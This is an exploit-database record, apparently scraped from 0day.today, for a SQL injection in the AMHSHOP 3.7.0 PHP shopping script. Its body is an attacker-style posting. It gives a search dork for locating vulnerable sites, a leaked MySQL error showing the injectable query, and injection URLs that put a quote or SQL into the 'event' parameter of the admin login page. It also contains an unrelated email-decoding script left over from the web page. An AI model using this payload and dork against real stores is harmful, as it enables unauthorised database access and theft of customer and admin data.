AMHSHOP 3.7.0 SQL Injection Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T00:02:47", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "AMHSHOP 3.7.0 SQL Injection Vulnerability", "published": "2011-06-15T00:00:00", "href": "http://0day.today/exploit/description/16338", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "0ca17abd39c70029691cb6b81b1f7618f23dba1bed53c666a57619bf47696b48", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Title : AMHSHOP 3.7.0 SQL Injection\r\n[+] Name : AMHSHOP 3.7.0\r\n[+] Affected Version : v3.7.0\r\n[+] Description : it's an arabic Shopping Script [Payable]\r\n[+] Software : http://amhserver.com/37/ & http://www.metjar.com/\r\n[+] Tested on : (L):Vista & Windows Xp and Windows 7\r\n[+] Dork : Powered by AMHSHOP 3.7.0\r\n[+] Date : 14/06/2011\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Author : Yassin Aboukir\r\n[+] Contact : 01Xp01@Gmail.com<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\r\n[+] Site : http://www.yaboukir.com\r\n[+] Greetz : Th3 uNkn0wnS Team ! & All My friends\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Error:\r\n MySQL\r\n \r\n * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1\r\n * Error Number:1064\r\n * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1\r\n \r\n \r\n \r\n# we had contacted the owner before and some websites have fixed the bug ;)\r\n \r\n[-] Exploit:-\r\n \r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]\r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'\r\n \r\n \r\nG00D LUCK ALL :)\r\n\r\n\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-16338", "sourceHref": "http://0day.today/exploit/16338", "modified": "2011-06-15T00:00:00", "reporter": "Yassin Aboukir", "enchantments": {"vulnersScore": 6.4}}